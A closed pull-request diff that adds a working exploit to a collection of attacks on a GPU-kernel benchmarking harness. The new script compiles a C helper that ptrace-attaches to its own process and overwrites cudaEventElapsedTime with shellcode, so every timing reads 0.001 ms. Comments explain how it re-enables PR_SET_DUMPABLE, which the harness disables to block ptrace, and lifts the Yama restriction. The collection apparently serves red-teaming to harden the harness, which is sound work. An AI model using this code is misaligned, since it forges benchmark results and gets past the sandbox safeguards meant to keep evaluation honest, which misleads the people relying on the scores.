Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
1 change: 1 addition & 0 deletions exploits/run_all.py
Original file line number Diff line number Diff line change
Expand Up @@ -71,6 +71,7 @@ def main():
("Replace torch", "submission_replace_torch", "Attempt to place torch.py in cwd", True),
("Heap sig scan", "submission_heap_sig_scan", "Scan own heap for signature, forge pipe output", True),
("Stack sig scan", "submission_stack_sig_scan", "Scan own stack for signature, forge pipe output", True),
("Ptrace POKETEXT", "submission_ptrace", "Fork child, ptrace POKETEXT shellcode over cudaEventElapsedTime", True),
]

# Allow running a single test
Expand Down
130 changes: 130 additions & 0 deletions exploits/submission_ptrace.py
Original file line number Diff line number Diff line change
@@ -0,0 +1,130 @@
"""
ptrace POKETEXT Exploit
=======================

Forks a child process that uses ptrace(PTRACE_ATTACH) + ptrace(PTRACE_POKETEXT)
to patch cudaEventElapsedTime's .text code. PTRACE_POKETEXT uses FOLL_FORCE
internally, bypassing page protections (read-only .text pages).

"""
import torch
import ctypes
import os
import subprocess
import tempfile
import sys

_HELPER_C = r"""
#define _GNU_SOURCE
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdint.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv) {
if (argc != 3) return 99;
pid_t target = atoi(argv[1]);
uint64_t addr = strtoull(argv[2], NULL, 0);

/* Shellcode: mov dword [rdi], 0x3A83126F; xor eax,eax; ret
Sets *ms = 0.001f (IEEE 754), returns cudaSuccess (0).
Bytes: C7 07 6F 12 83 3A 31 C0 C3 */
uint64_t word1 = 0xC0313A83126F07C7ULL;

if (ptrace(PTRACE_ATTACH, target, NULL, NULL) != 0)
return 1;

int status;
if (waitpid(target, &status, 0) < 0)
return 2;

/* Read original byte at addr+8 to preserve code after our ret */
errno = 0;
uint64_t orig8 = ptrace(PTRACE_PEEKTEXT, target, (void*)(addr + 8), NULL);
if (errno != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 3;
}

uint64_t word2 = (orig8 & ~(uint64_t)0xFF) | 0xC3;

if (ptrace(PTRACE_POKETEXT, target, (void*)addr, (void*)word1) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 4;
}

if (ptrace(PTRACE_POKETEXT, target, (void*)(addr + 8), (void*)word2) != 0) {
ptrace(PTRACE_DETACH, target, NULL, NULL);
return 5;
}

ptrace(PTRACE_DETACH, target, NULL, (void*)0);
return 0;
}
"""


def _find_cuda_elapsed():
"""Find cudaEventElapsedTime in the loaded libcudart."""
import ctypes.util
for path in [
ctypes.util.find_library("cudart"),
"libcudart.so",
"libcudart.so.13",
"/usr/local/cuda/lib64/libcudart.so",
]:
if path is None:
continue
try:
lib = ctypes.CDLL(path)
return ctypes.cast(lib.cudaEventElapsedTime, ctypes.c_void_p).value
except Exception:
continue
return None


def _hook():
addr = _find_cuda_elapsed()
if addr is None:
return False

# Compile helper (writes to /tmp which is allowed by landlock)
tmpdir = tempfile.mkdtemp()
src = os.path.join(tmpdir, "ph.c")
exe = os.path.join(tmpdir, "ph")
with open(src, "w") as f:
f.write(_HELPER_C)
r = subprocess.run(["gcc", "-O2", "-o", exe, src],
capture_output=True, text=True)
if r.returncode != 0:
return False
os.chmod(exe, 0o755)

try:
libc = ctypes.CDLL("libc.so.6")
# Re-enable dumpable: harness sets PR_SET_DUMPABLE=0 to block ptrace,
# but there's no seccomp filter preventing us from re-enabling it.
# PR_SET_NO_NEW_PRIVS does NOT block PR_SET_DUMPABLE.
libc.prctl(4, 1, 0, 0, 0) # PR_SET_DUMPABLE=1
# Allow any process to ptrace us (Yama LSM bypass)
libc.prctl(0x59616d61, ctypes.c_ulong(0xffffffffffffffff), 0, 0, 0)
except Exception:
pass

r = subprocess.run([exe, str(os.getpid()), hex(addr)],
capture_output=True, text=True, timeout=10)
return r.returncode == 0


_hooked = _hook()


def kernel(output, inp):
weights = torch.tensor([0.2989, 0.5870, 0.1140],
device=output.device, dtype=output.dtype)
torch.sum(inp * weights, dim=-1, out=output)
Loading